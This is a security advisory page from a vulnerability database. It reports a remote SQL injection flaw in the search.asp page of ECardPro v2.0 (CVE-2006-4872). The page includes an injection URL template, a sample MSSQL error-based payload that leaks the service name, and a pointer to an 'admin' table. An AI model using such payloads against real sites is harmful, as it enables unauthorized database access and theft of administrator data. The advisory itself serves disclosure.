Bug: ECardPro v2.0(search.asp) Remote SQL Injection Vulnerability (WLB-2006090137 Ascii Version)

English Version
WLB2

CVE WLB2

 Topic: ECardPro v2.0(search.asp) Remote SQL Injection Vulnerability
 Credit: ajann
 Date: 2006.09.22
 CWE: CWE-89 (Show similar)
 CVE: CVE-2006-4872 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Risk
Local
Remote
Medium
No
Yes

Vulnerability Report

************************************************************************
*******

# Title : ECardPro v2.0(search.asp) Remote SQL Injection Vulnerability

# Author : ajann

# Script Page : http://www.keyvan1.com

# Exploit;

************************************************************************
*******

Data: MSSQL

###http://[target]/[path]/search.asp?keyword='[SQL HERE]

Example: search.asp?keyword='AND%201=convert(int,%20@@servicename) ==> MSSQL Service Name

Admin Table: "admin"

etc(systemtables,union,update,select)......

# ajann,Turkey

# ...

# Im not Hacker!

[ ASCII VERSION ]

Copyright 2012, cxsecurity.com